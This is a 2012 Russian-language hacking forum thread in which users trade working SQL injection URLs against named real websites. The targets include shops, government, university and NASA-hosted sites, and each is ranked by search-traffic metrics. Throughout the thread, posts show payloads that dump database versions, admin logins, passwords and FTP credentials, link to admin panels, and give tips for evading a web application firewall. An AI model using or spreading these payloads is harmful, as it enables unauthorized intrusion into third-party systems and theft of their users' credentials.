Просмотр полной версии : SQL Инъекции
kingbeef
11.10.2012, 12:54
Я помогу
http://www.yogacenter.ru/page.php?id=-20+union(select+1,2,3,4,version())
vitya1599
11.10.2012, 19:34
Code:
http://www.breakdanceliga.ru/index.php?g=420012+and+1=0+union+select+1,2,3,4,5, 6,7,8,9,10,11,12,13--+
Code:
http://www.crep.com.au/news.php?p=107+and+1=0+union+select+1,2,3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--+
Админка: http://www.crep.com.au/news/wp-admin .
Шелл залить не пробовал, но до админки 100% добраться можно.
Code:
http://elmos.ru/index.php?z=cat&cat_main_id=7&cat_group_id=0&CID=46+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,1 1,12,13,14,15--+
Вот ещё.
http://www.delfon.ru/sounds_mp3.php?action=view&id=87962'+AND+1=0+UNION+SELECT+1,2,3,4,5,6--
Тиц: 10
Ru трафа: 6000 уников
Pr: 4
www.melori-rosenberg.com
Code:
http://www.melori-rosenberg.com/artists-home.php?id=74%09union%09select%091,concat_ws(user (),database(),version()),3--
PR 3
melorimelori@localhost5.0.51a-3ubuntu5.4
chernomor-cosmetics.com.ua
HTML:
http://chernomor-cosmetics.com.ua/school.php?id=-64%20union%20select%201,2,3,group_concat(login,0x0 3a,pass)+from+admin
Тиц 10
http://chernomor-cosmetics.com.ua/admin/
www.isolmax.com
PHP:
http://www.isolmax.com/ang/produit.php?ID=-5'+union+select+1,2,concat_ws(user(),database(),ve rsion()),4,5,6--+f
PR 1
isolmaxisolmax@localhost5.1.61
www.securitysourcing.net
PHP:
http://www.securitysourcing.net/categorie-produit.php?id=-1'+union+select+1,2,group_concat(id_admin,0x03a,lo gin_admin,0x03a,password_admin),4,5,6,7,8,9,10,11, 12,13,14+from+administrateur--+f
PR 1
sstssttunisie@localhost5.0.27
www.hss-secure.com
PHP:
http://www.hss-secure.com/categorie-produit.php?id=-1'+union+select+1,2,group_concat(id_admin,0x03a,lo gin_admin,0x03a,password_admin),4,5,6,7,8,9,10,11, 12+from+administrateur--+f
hsecurethsecuret@localhost5.1.37-1ubuntu5-log
Shop
http://www.armorysquareofsyracuse.com/main/shopping.php?id=-179+union%28select+1,version%28%29,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26% 29
vitya1599
14.10.2012, 00:12
http://www.newssafety.org/newsletter/news.php?v=34+and+1=0+union+select+1,2,3,4,5--+
Code:
http://www.ttkplus.ru/index.php?pages=-91+union+(select+1,2,3,4,5,6,7)
Тиц: 10
kingbeef
15.10.2012, 20:18
rashdh said:
http://tourpackagesofindia.com/discussion.php?bid=58
туристическое агентство
Что мешало сделать так ?
http://tourpackagesofindia.com/discussion.php?bid=-58+union+select+1,2,3,version(),5--+f
eurociti.ru
PHP:
http://www.eurociti.ru/page.php?id=40+or+1+group+by+concat%28%28select+ve rsion%28%29%29,0x00,floor%28rand%280%29*2%29%29hav ing+min%280%29+or+1--+
(CY)30
(PR)3
5.0.83-log
Code:
http://www.foxconncase.ru/index.php?id=12&series=-19+union+select+1,2,3,4,5,6,7,user(),9,10,11,12,13 ,14,15,16--+&cHash=a7c923f3b846bc69c8be992da104ed39
victoriya-security.ru
PHP:
http://www.victoriya-security.ru/consultation.php?id=35%27+or+1+group+by+concat%28% 28select+version%28%29%29,0x00,floor%28rand%280%29 *2%29%29having+min%280%29+or+1--+
5.1.61-log
(CY)10
(PR)2
-----------------------------------------------------------------------------------
sea.infoflot.ru
PHP:
http://sea.infoflot.ru/ru/articles/?id=12%27+or+1+group+by+concat%28%28select+version %28%29%29,0x00,floor%28rand%280%29*2%29%29having+m in%280%29+or+1--+
5.5.28
(CY)20
(PR)3
------------------------------------------------------------------------------------
bdva.ru
PHP:
http://bdva.ru/konserts.phtml?id=36+or+1+group+by+concat%28%28sel ect+version%28%29%29,0x00,floor%28rand%280%29*2%29 %29having+min%280%29+or+1--+
5.1.63-0+squeeze1-log
(CY)850
(PR)0
-----------------------------------------------------------------------------------
frogtur.ru
PHP:
http://frogtur.ru/country.php?id=13+union+select+1,version%28%29,3,4 ,5--+
(CY) 0
(PR) 3
5.1.49-rel11.3-log
-----------------------------------------------------------------------------------
Code:
http://www.localtoolbox.com/corporate/index.php?cat_id=-93'+union+ select+1,2,3,version(), user(),6,7, database(),9,10,11--+
Спасибо Skofield (https://antichat.live/member.php/u/64286/)
Га-Ноцри
20.10.2012, 00:59
Nothing interesting here.
ТИц == 0, PR == 3;
PHP:
http://www.microage-bathurst.ca/products.php?id=-1+union+select+1,cast(concat_ws(0x03a,user(),datab ase(),version())+as+binary)+--+
ТИц == 0, PR == 4;
PHP:
http://www.theswancorp.com/index.php?prod=-1+union+select+1,concat_ws(0x03a,user(),database() ,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+
ТИц == 0, PR == 2;
PHP:
http://www.pamwright.com.au/shop/shop.php?cat=-1+union+select+1,2,3,4,5,concat_ws(0x03a,user(),da tabase(),version()),7+--+
http://vkpiarka.ru/index.php?act=main'+union+select+1,2,3,version(),u ser(),6,7,database()
-+
Перестройте под себя .
Сервис для накрутки ВК .
ukrobyava.com.ua
PHP:
http://www.ukrobyava.com.ua/idv.php?id=27616%27+or+1+group+by+concat%28%28sele ct+version%28%29%29,0x00,floor%28rand%280%29*2%29% 29having+min%280%29+or+1--+
(CY) 10
(PR) 2
5.0.90
----------------------------------------------------------------------------------
paulduncan.org
PHP:
http://paulduncan.org/?id=302+or+1+group+by+concat%28%28select+version%2 8%29%29,0x00,floor%28rand%280%29*2%29%29having+min %280%29+or+1--+
5.0.45-5
(CY) 0
(PR) 4
----------------------------------------------------------------------------------
dfm74.ru
PHP:
http://dfm74.ru/site/index/di_news/?id=104%27+or+1+group+by+concat%28%28select+versio n%28%29%29,0x00,floor%28rand%280%29*2%29%29having+ min%280%29+or+1--+
5.0.45
(CY) 20
(PR) 3
-----------------------------------------------------------------------------------
38.gibdd.ru
управление гибдд Иркутсеой области ))
PHP:
http://38.gibdd.ru/news_all.php?id=-147%27+union+select+1,2,3,4,version%28%29,6,7,8--+
(CY) 40
5.0.87-percona-highperf-log
-----------------------------------------------------------------------------------
petrova-tikhonov.ru
PHP:
http://www.petrova-tikhonov.ru/diary/index.php?id=188+or+1+group+by+concat%28%28select+ version%28%29%29,0x00,floor%28rand%280%29*2%29%29h aving+min%280%29+or+1--+
(CY) 250
(PR) 3
5.0.90
-----------------------------------------------------------------------------------
sibabitur.ru
PHP:
http://www.sibabitur.ru/vuz.php?id=193+or+1+group+by+concat%28%28select+ve rsion%28%29%29,0x00,floor%28rand%280%29*2%29%29hav ing+min%280%29+or+1--+
5.0.95-community-log
CY) 30
PR) 2
-----------------------------------------------------------------------------------
http://www.tvbase.ru/catalog.php?class=3&type=-71+and+1=2+union+select+1,2,concat(@@version,0x3a, user(),0x3a,database()),4
http://www.hifiend.ru/catalog.php?class=2&type=-71+and+1=2+union+select+1,2,concat(@@version,0x3a, user(),0x3a,database()),4
как понял по сути это один магазин
PHP:
http://www.mosrental.ru/buy/id/-24+union+select+1,2,3,4,5,6,user(),8,9,10,11,12,13 ,14,15,16,17,18,19,20,21+--+
Тиц 10
Пр 1
1-инъекция
http://shveimash.spb.ru/index.php?type=catalog&id=110&atype=-1+union+select+1,table_name,3+from%20information_s chema.tables&cat=54
2-инъекция
http://shveimash.spb.ru/index.php?type=catalog&id=110&atype=-1+union+select+1,column_name,3+from%20information_ schema.columns+where+table_name=0x6c696e6b73&cat=54
Что делать решать Вам
http://tourpackagesofindia.com/discussion.php?bid=-58+union+select+1,column_name,3,4,5+from+informati on_schema.columns+where+table_name=0x4348415241435 445525f53455453+--+
Яндекс тИЦ (CY) 100
Google PageRank (PR) 3
Code:
http://www.inharmony.ru/news/news.php?id=-169+union+select+1,user(),version(),4,5,database() ,7--
www.gusberti.it
Code:
http://www.gusberti.it/scheda.php?id=-30+union+select+1,2,3,group_concat(nome,0x03a,pwd, 0x03a,email),5+from+web_users--
PR1
gusbertigusberti_local@localhost5.1.61
www.christianmichael.co.uk
http://www.christianmichael.co.uk/nblog.php?id=-52+union+select+concat_ws(user(),database(),versio n()),2--
PR 4
chrismic_databasechrismic_ph0t0@localhost5.0.95-community
www.santapod.co.uk
http://www.santapod.co.uk/dr_stand2007detail.php?ID=-52+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws( user(),database(),version()),13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 ,37--
PR 4
db162245123dbo162245123@212.22
www.cloud.co.uk
http://www.cloud.co.uk/products/detail.php?id=-52%27+union+select+1,2,3,concat_ws(id,0x3ae,site,0 x3ae,ftp_host,0x3ae,ftp_folder,0x3ae,ftp_username, 0x3ae,ftp_password),5,6,7,8,9,10,11,12,13+from+ftp _sites--+f
PR 4
cloud_dbcloud_dbadmin@localhost5.1.65-cll 5
www.swin.edu.au
PHP:
http://www.swin.edu.au/engineering/cmp/news.php?id=-39+union+select+concat_ws(user(),database(),versio n()),2,3,4,5,6,7,8,9,10--+
ТИЦ 400
PR 8
AR 36,975
DMOZ> Reference> Education> Colleges_and_Universities> Oceania> Australia> Victoria> Swinburne_University_of_Technology
microphotonmicrophoton@www3.cc.swin.edu.au5.1.61-log
Га-Ноцри
28.10.2012, 03:13
Nothing interesting here.
Тиц == 10, PR = 4;
PHP:
http://ecorporateoffices.com/biz.php?id=-1'+union+select+1,2,3,4,5,6,version(),8+--+h
PR ==1;
PHP:
http://nextjobathome.com/next-job-at-home-details.php?id=-3960+union+select+1,2,version(),4,5,6,7,8,9+--+
mr.KREGI
28.10.2012, 15:29
http://tdpu.uz/
PHP:
http://www.tdpu.uz/abit2011/index.php?o=info&op=tush&id=99999999+union+select+1,2,version(),4,5,6,7,8,9 ,10,11,12,13,14+--+
ТИЦ 30
PR 4
DMOZ World: O'zbekcha: Hududiy: Osiyo: O‘zbekiston: Ma'muriy-hududiy tuzilish: Viloyatlar: Tоshkеnt: Tоshkеnt shаhаri: Ta’lim: Oliy ta’lim
User: abit2011@localhost
Sql Version: 5.5.14
rol-lift.ee
PHP:
http://www.rol-lift.ee/index.php?id=168&lang=rus%27+or+1+group+by+concat%28%28select+versi on%28%29%29,0x00,floor%28rand%280%29*2%29%29having +min%280%29+or+1--+
5.0.51a-24+lenny1-log
(CY) 0
(PR) 4
==============================================
myswiss.ru
PHP:
http://www.myswiss.ru/?page=11&id=-812+union+select+1,2,3,4,5,6,version%28%29,8,9--+
5.0.67-percona-highperf-b7-log
(CY) 180
(PR) 4
==============================================
PHP:
http://www.cinema-rp.com/index.php?id=812+order+by+15%20--
pr 6
тиц 150
PHP:
http://www.parnas-moscow.ru/events/?id=3859+order+by+1%20--
pr 3
тиц 70
PHP:
http://www.eloundapeninsula.com/index.php?id=2+union+select+1+--+
pr 4
тиц 150
PHP:
http://www.heavymetal.com/index.php?id=812+order+by+12%20--
pr 5
тиц 20
PHP:
http://www.my-eisk.ru/index.php?option=com_eisk&idd=-235+union+select+1,2,3,4,5,6,7,8,9,version(),11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45, 46,47,48,49,50,51--
PHP:
http://www.pan-invest.com/index.php?option=products&Itemid=62&id_cat=235+union+select+version()--
svkurort.ru
PHP:
http://svkurort.ru/news.php?id=80%27+or+1+group+by+concat%28%28select +version%28%29%29,0x00,floor%28rand%280%29*2%29%29 having+min%280%29+or+1--+
(CY) 10
(PR) 0
5.0.32-Debian_7etch12-log
------------------------------------------------------------------------------------
parapsiholog.lv
PHP:
http://www.parapsiholog.lv/index.php?action=news&id=48+or+1+group+by+concat%28%28select+version%28% 29%29,0x00,floor%28rand%280%29*2%29%29having+min%2 80%29+or+1--+
5.5.27-log
CY) 10
(PR) 2
----------------------------------------------------------------------------------
rstomat.ru
PHP:
http://rstomat.ru/pages.php?id=93+or+1+group+by+concat%28%28select+v ersion%28%29%29,0x00,floor%28rand%280%29*2%29%29ha ving+min%280%29+or+1--+
5.1.65-cll
(CY) 0
(PR) 0
-----------------------------------------------------------------------------------
msk-registr.ru
PHP:
http://msk-registr.ru/cont.html?id=6+or+1+group+by+concat%28%28select+ve rsion%28%29%29,0x00,floor%28rand%280%29*2%29%29hav ing+min%280%29+or+1--+
5.1.41-log
(CY) 10
(PR) 2
----------------------------------------------------------------------------------
http://www.tristateracer.com/Results/resultspage.php?Year=-1488%27%20union%20select%201,table_name,3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18%20from%20informatio n_schema.tables;+--+
для получения резалта - жмякаем "January"
Да здравствует FOREX
Выкладываю с учётом того, что данная SQL лежит под жестоким WAF и не несёт смысла в раскрутке.
MsAccess
Site: www.wmfx.us
Inject:
Code:
_ttp://www.wmfx.us/English/forex.asp?ID=5+or+1=1
Code:
http://www.wmfx.us/English/forex.asp?ID=5+group+by+1+having+1=1
��ͼִ�еIJ�ѯ�в�����Ϊ�ϼ ���һ���ֵ��ض����ʽ 'ID' ��
/English/forex.asp���� 277
Code:
http://www.wmfx.us/English/forex.asp?ID=5+group+by+1,id,AboutNameEn,ContentEn ,GroupID,Exclusive,ClickNumber+having+1=1
PR и TYC 0, Alexa очень высокий
Сайт "на чисто поглазеть..."
Site : GroupFo.ru
PR : 0, TY : 0.
Сайт партнерской программы.
Post:
http://groupfo.ru/reg.htm
Data:
answer=5&email=3&icq=3&invait=-1 OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT+%40%40VERSION), 9,1)),0)>0),1,2))--%20®_button=+%d0%a0%d0%b5%d0%b3%d0%b8%d1%81%d1%82%d 1%80%d0%b0%d1%86%d0%b8%d1%8f+&rlogin=3&rpass=3&rpass_r=3&wmid=3&wmr=3
http://www.svr-oskol.ru/rus/?cid=-3%20and%201=2%20union%20select%20@@version,2--&lng=ru
5.1.65-cll
GOV, PR 4
Code:
http://www.murrayky.gov/showevent.htm?ID=-123+union+select+1,2,3,4,concat(database(),0x3a,ve rsion()),6,7,8,9,10,11,12,13,14,15,16--
citybusiness:5.0.51a-community
GOV, PR 4
Code:
http://www.newportky.gov/HPO_east_row_gudielines_porches.php?secid=-139+union+select+1,2,concat(database(),0x3a,versio n()),4,5,6,7--
info:4.0.25
http://www.raleighpediatrics.com/index.php?pId=-1+union+select+1,2,3,4--
админка (http://www.raleighpediatrics.com/admin)
fox*card
11.11.2012, 15:23
http://www.adventure3.com/promos/cg/brand_products.php?subcat_id=571-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18--
_Pantera_
11.11.2012, 15:32
fox*card said:
http://www.adventure3.com/promos/cg/brand_products.php?subcat_id=571-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18--
Чувак, ты не правильно составил запрос.
Code:
http://www.adventure3.com/promos/cg/brand_products.php?subcat_id=5+union+select+1,2,3, 4,version(),6,7--
5.0.95-log - дальше все стандартно
fox*card
11.11.2012, 15:33
http://bbs.myhack58.com/read.php?tid=290684-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4-- [0:0]
autoinscale.com
PHP:
http://www.autoinscale.com/?section=article&id=64+or+1+group+by+concat%28%28select+user+from+m ysql.user%29,0x00,floor%28rand%280%29*2%29%29havin g+min%280%29+or+1--+
(CY)40
(PR)3
5.0.26-log
=============================================
ridel-holding.com
PHP:
http://ridel-holding.com/prom/view_price.php?id=-4%27+union+select+version%28%29,2--+
(CY) 20
(PR) 1
4.0.26
=============================================
spectehsnab.ru
PHP:
http://www.spectehsnab.ru/index1.php?id=269+or+1+group+by+concat%28%28select +version%28%29%29,0x00,floor%28rand%280%29*2%29%29 having+min%280%29+or+1--+
(CY) 0
(PR) 2
5.1.60
=============================================
newrzhev.ru
PHP:
http://www.newrzhev.ru/articles.php?id=173+or+1+group+by+concat%28%28sele ct+version%28%29%29,0x00,floor%28rand%280%29*2%29% 29having+min%280%29+or+1--+
(CY) 40
(PR) 3
5.5.24-0ubuntu0.12.04.1
==============================================
ssrb.ru
PHP:
http://www.ssrb.ru/enterprise/?c=&id=18392%27+or+1+group+by+concat%28%28select+versi on%28%29%29,0x00,floor%28rand%280%29*2%29%29having +min%280%29+or+1--+
5.1.63-0+squeeze1
(CY) 70
==============================================
industr.ru
PHP:
http://www.industr.ru/news/index.php?id=15265+or+1+group+by+concat%28%28selec t+version%28%29%29,0x00,floor%28rand%280%29*2%29%2 9having+min%280%29+or+1--+
5.1.65-cll
(CY)130
(PR)3
==============================================
http://www.boys.njpanthers.com/preview.php?id=-1+union+select+1,2--
////
Мой колледж
http://college.ks.ua/index.php?menu=-1 UNION ALL SELECT CONCAT(CAST(username AS CHAR),0x20,CAST(password AS CHAR)) FROM users WHERE id_user=13#
Code:
http://www.editionsmosquito.com/auteur.php?id=19999+uni on+select+1,2,3,vers ion%28%29,5,6,7,8,9,10
4.1.23-PRO-LOG
http://www.silach.ru/image/logo_en.jpg
http://www.silach.ru/trenazhery.php?s=catalog&cat=-60%20and%201=2%20union%20select%201,@@version,3,da tabase(),5,user(),7+--
m46340@fhe7.hoster.ru db46340m 4.0.27-log
www.cirs.fr
HTML:
http://www.cirs.fr/researchers/researchers.php?id=-73'+union+select+1,concat_ws(user(),database(),ver sion()),3,4,5,6,7,8,9,10,11,12,13,14,15--+f
PR 7
cirs_orgcirs_org@localhost5.1.61-log
www.umih.fr
HTML:
http://www.umih.fr/adh-ow-dpt.php?id=-73+union+select+concat_ws(user(),database(),versio n())
ТИЦ10
PR 5
AR 649,608 DMOZ
UMIHNATihnet@localhost5.0.44-log
ТИЦ 600, PR 6
PHP:
http://surveylearning.moodle.com/mod/survey/view.php?id=2-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15--
Expl0ited
17.11.2012, 01:19
Code:
http://rotorcraft.arc.nasa.gov/refbase/search.php?sqlQuery=SELECT+version(),title,type,ye ar,publication,abbrev_journal,volume,issue,pages,k eywords,abstract,address,corporate_author,place,co nference,call_number,serial+FROM+refs+WHERE+serial =512+ORDER%20BY%20author,%20year%20DESC,%20publica tion&client=&formType=sqlSearch&submit=Display&viewType=&showQuery=0&showLinks=1&showRows=5&rowOffset=&wrapResults=1&citeOrder=&citeStyle=APA&exportFormat=RIS&exportType=html&exportStylesheet=&citeType=html&headerMsg=
nemaniak
17.11.2012, 19:12
fgosvpo.ru ТИЦ-160 PR-5
Code:
fgosvpo.ru/index.php?menu_id=21&menu_type=4&parent=0&id=-133+union+select+1,concat_ws(0x3a,version(),user() ,database()),3,4,5,6,7,8,9+--+
Code:
5.5.24-log:u277450@10.8.3.28:u277450
mountain.ru ТИЦ-3300 PR-6 3.3к уников
Code:
www.mountain.ru/news/last.php?news_id=-12860+union+select+1,concat_ws(0x3a,version(),user (),database()),3,4,5,6,7,8,9,0,11,12,13+--+
Code:
5.0.51a-log:newsmanager@127.0.0.1:news_mountain
novstroy.ru ТИЦ-475
Code:
www.novstroy.ru/newman/news2.php?news_id=-6643122+union+select+1,2,3,concat_ws(0x3a,version( ),user(),database()),5,6,7,8,9,0,11,12,13,14,15,16 ,17+--+
Code:
5.0.51a-17vc-log:news@localhost:news
www.freie-radios.at
HTML:
http://www.freie-radios.at/cmfe/print.php?id=-25%27+union+select+1,group_concat(username,0x3ae,p assword),3,4,5,6+from+users+--+f
PR5
DMOZ > World> Deutsch> Medien> Radio> Organisationen
http://www.freie-radios.at/admin/
www.bioenergetik.at
HTML:
http://www.bioenergetik.at/page.php?id=-25/**/union/**/select/**/1,2,3,4,concat_ws(user(),database(),version()),6,7 ,8,9,10--
PR 3
bioenerg_dbbioenerg@localhost5.0.51a-24+lenny5
Тиц : 7
PR : 3
http://primavera-rk.net/news.php?id=-7+union+select+1,2,concat(user(),0x3a,database()), 4,5,6
http://www.mir-tv.ru/help.php?id=-2+UNION+SELECT+1,2,version(),4
http://www.position1.ru/index-1.php?id=-46+UNION+SELECT+1,2,3,version()
http://www.be-on.net/products.php?id=-230+union+select+1,2,version(),4,5,6,7,8,9,10,11,1 2,13,14,15,16,17
pr6
http://www.northlandcollege.edu/athletics/headlines/headline.php?id=-48+union+select+1,2,3,4,5,concat_ws(0x3a,user(),ve rsion(),database()),7,8,9,10,11,12,13,14,15+--+
cmsacct@localhost:5.1.63-0+squeeze1:cms
www.kinderinwien.at
HTML:
http://www.kinderinwien.at/presse-detail_c.php?id=-25 union select 1,2,3,concat_ws(user(),database(),version()),5,6,7 ,8,9,10,11,12,13,14,15--
PR 6
ki002xf4_kiwiki002xf4@10.1.1.335.0.51a-24+lenny5-log
Code:
http://www.mascar.it/product.php?id=3%20LIMIT%200%2C1%20UNION%20ALL%20S ELECT%20NULL%2CCONCAT%280x3a6476633a%2CIFNULL%28CA ST%28azienda%20AS%20CHAR%29%2C0x20%29%2C0x746b6c71 6470%2CIFNULL%28CAST%28cognome%20AS%20CHAR%29%2C0x 20%29%2C0x746b6c716470%2CIFNULL%28CAST%28datacreaz ione%20AS%20CHAR%29%2C0x20%29%2C0x746b6c716470%2CI FNULL%28CAST%28dataultimoaccesso%20AS%20CHAR%29%2C 0x20%29%2C0x746b6c716470%2CIFNULL%28CAST%28email%2 0AS%20CHAR%29%2C0x20%29%2C0x746b6c716470%2CIFNULL% 28CAST%28login%20AS%20CHAR%29%2C0x20%29%2C0x746b6c 716470%2CIFNULL%28CAST%28nazioneid%20AS%20CHAR%29% 2C0x20%29%2C0x746b6c716470%2CIFNULL%28CAST%28nome% 20AS%20CHAR%29%2C0x20%29%2C0x746b6c716470%2CIFNULL %28CAST%28password%20AS%20CHAR%29%2C0x20%29%2C0x74 6b6c716470%2CIFNULL%28CAST%28userid%20AS%20CHAR%29 %2C0x20%29%2C0x3a7662763a%29%2CNULL%2CNULL%2CNULL% 20FROM%20mascar.ac_utenti%23
пробелы удалите..
http://www.akiba-bb.net/contents/program/contents.php?id=-44'+union+select+1,user(),database(),version(),gro up_concat(schema_name+SEPARATOR+0x0b),6,7,8,9,10,1 1,12,13,14%20from%20information_schema.schemata--%20a
http://www.nordiz.ru/tovar.php?tovar_id=-1+UNION+SELECT+1,2,3,null,5,group_concat(schema_na me+SEPARATOR+0x0b),7,8,9,user(),11,12,13,14,15,16, 17,18,19,20,null,22,23,24,25,26,version(),28,29,30 ,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,4 7,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63, 64,65,66,67,68,69,70,71,72%20from%20information_sc hema.schemata
// З.Ы. Юзай редактирование постов
// А было бы 10 скулей - 10 постов ?)
// BigBear
несколько сайтов
http://boatiq.ru/wp-content/plugins/all-video-gallery/config.php?vid=12&pid=-1+union+select+1,2,3,4,group_concat(user_login,0x3 a,user_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37,38,39,40,41+from+wp_users--
http://www.partenapoint.be/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=-1+union+select+1,2,3,4,group_concat(user_login,0x3 a,user_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37,38,39,40,41+from+wp_users--
http://apirak.thaiza.ws/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=-1+union+select+1,2,3,4,group_concat(user_login,0x3 a,user_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37,38,39,40,41+from+wp_users--
http://apirak.thaiza.ws/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=-1+union+select+1,2,3,4,group_concat(user_login,0x3 a,user_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37,38,39,40,41+from+wp_users--
www.tii.se
PHP:
http://www.tii.se/nodem/exhibition.php?subpage=entry&id=-36/**/union/**/select/**/1,concat_ws(user(),database(),version()),3,4,5,6,7--
PR 7
ТИЦ 30
nodemnodem@localhost5.0.45-standard-log
Agel Nash said:
HTML:
http://leffet.ru/view_goods.php?id=(SELECT+100)
http://leffet.ru/view_goods.php?id=-1+union+select+1,2,3,4,version(),database(),7,8,9, 10,11
Code:
http://www.hukapparel.co.uk/products.php?item=-9999999999.9+union+select+1,2,3,4,5,6,7,8,9,10,11, 12,13,14,15,version(),17,18,19,20,21,22+--+
www.selbsthilfe-online.de
Code:
http://www.selbsthilfe-online.de/druckversion.php?id=-35+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,concat_ws(user(),database(),versi on()),22,23,24,25,26--
PR 5
dbwww31_1www31db@localhost5.0.90
www.krcmapraha.cz
Code:
http://www.krcmapraha.cz/en/rezervace-menu.php?ID=-119'%20union%20select%201,concat_ws(user(),databas e(),version()),3--+f
PR 2
d13087_krcmaw13087_krcma@10.28.8.145.5.23
www.rengl.cz
Code:
http://www.rengl.cz/ceniky/mesto.php?id=-119'+union+select+1,concat_ws(user(),database(),ve rsion()),3,4,5,6,7,8,9,10--+f
PR 5
AR 817,157
renglrengl@localhost5.1.61
www.mikule.cz
Code:
http://www.mikule.cz/index.php?id=-119+union+select+1,concat_ws(user(),database(),ver sion()),3,4,5,6,7--
PR 2
reality_mikule_czreality.mikule.cz@93.185.104.205. 1.61-log
PR 5
PHP:
http://www.nda.org.za/index.php?option=3&id=1&com_id=-235+union+select+version(),2,3--
тиц50 pr3
PHP:
http://www.pan-invest.com/index.php?option=products&Itemid=62&task=showCurGoods&id_cat=279&id_goods=-5374+union+select+11111,version()--
http://royalsites.info/freebill/clients/packages.php?id=-1'+UNION+ALL+SELECT+1,CONCAT(username,char(58),pas sword),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 +from+adminusers%23
Пустышка)
Pirotexnik
05.12.2012, 22:43
http://kraspol.net/wp-content/plugins/wp-adserve/adclick.php?id=-1+/*!uNioN*//**//*!sEleCT*//**/user()+--+
как обходить спэйсвэбовский ваф?
Pirotexnik said:
http://kraspol.net/wp-content/plugins/wp-adserve/adclick.php?id=-1+/*!uNioN*//**//*!sEleCT*//**/user()+--+
как обходить спэйсвэбовский ваф?
_ttp://kraspol.net/wp-content/plugins/wp-adserve/adclick.php?id=1+and+1=2+union+select+@@version+--+
_ttp://kraspol.net/wp-content/plugins/wp-adserve/adclick.php?id=1+and+1=2%0Aunion%0Aselect+table_na me+from+information_schema.tables+limit+0,1+--+
Используй %0A вместо пробела в связке union select
P.S. А вообще ты темой ошибся. Тебе в соседнюю.
reuvenmatbil
08.12.2012, 01:27
Code:
http://www.futuresfins.com/fin-detail.php?id=173+union+select+1,2,3,4,5,6,7,8,9,1 0,version()
Code:
http://choices.edu/resources/detail.php?id=37+union+select+1,2,3
Code:
http://www.jetonfireplace.com/ProductInfo.php?id=818+union+select+1,2,3,version( ),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
Code:
http://snakedancecondos.com/pages.php?id=10'+union+select+1,2,3
Code:
http://www.thedailystar.net/newDesign/pages.php?id=-04+union+select+version()
Code:
http://www.miamiwinefair.com/pages.php?id=-1+union+select+1,2,version()
Code:
http://www.enlightenmentquartet.com/index.php?id=-9+union+select+concat_ws(version(),user()),2
Code:
http://www.rajasthanexperience.com/pages.php?id=-1+union+select+1,2,version()
Code:
http://www.nau.in/announce.php?id=-595+union+select+1,2,version(),4,5,6,7,8,9,10
Code:
http://www.mtosmt.org/mto-announce.php?id=108+union+select+1,2,3,version(),5
Code:
http://www.wellerpools.com/news-read.php?id=-22+union+select+1,version(),3,4,5,6,7,8,9,10
Code:
http://www.sourceisrael.com/read.php?id=-229+union+select+1,version(),3,4,5,6,7,8,9,10,11
Code:
http://www.dhammaweb.net/Tipitaka/read.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,version()
Code:
http://www.hdtinfo.com/news/read.php?id=-1157947239+union+select+1,user(),3,4,5
ArtyomVK
09.12.2012, 14:02
Code:
http://www.svr-oskol.ru/rus/?cid=-3%20and%201=2%20union%20select%20@@version,2--&lng=ru
reuvenmatbil
10.12.2012, 01:47
online shop
Code:
http://www.chinastarwholesale.com/productinfo.php?id=-228+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15
Code:
http://www.vietnamfoodstuff.com/productinfo.php?id=115+union+select+1,2,3,version( ),5
Code:
http://www.euroantiquemarket.com/productinfo.php?id=p_08120510+union+select+1,2,3,4 ,5,6,7,8,9
comynicator
10.12.2012, 14:18
http://www.virgingordabvi.com/villainfo.php?vid=61+UNION+SELECT+1,2,3,4,5,6,7,8, 9,10,11,12,version(),14,15,16,17+--+
Current User: vbi_admin1@localhost
Sql Version: 5.0.45-community-nt
Current DB: vg_vbi_db
// О, великий Havij !!!
// Преклоняемся тебе, да святятся байты твои !
// BigBear
Code:
http://www.jooproperty.com/en/?option=com_jooproperty&view=booking&layout=modal&product_id=-1+/*byn3m1s*/union+select+1,concat(user(),0x3a,database())--
scweb24sql1@localhost:scweb24sql1
self-profit
12.12.2012, 12:30
Code:
http://www.td-tehkomplekt.ru/index.php?id=26+union+select+1,2,3,4,5,6,7
Target: http://www.td-tehkomplekt.ru/catalog.php?id=11
DB Server: MySQL
Current DB: td_tehkomp_db
Data Bases: information_schema
td_tehkomp_db
// Логины и пароли выкладывать нельзя !!!
// BigBear
sql'S
1)
Code:
http://www.generationendialog.de/aktuell.php?id=9999+union+select+null,null,concat( user(),version(),database()),null,null,null,null+--+
----------------------------------------------------
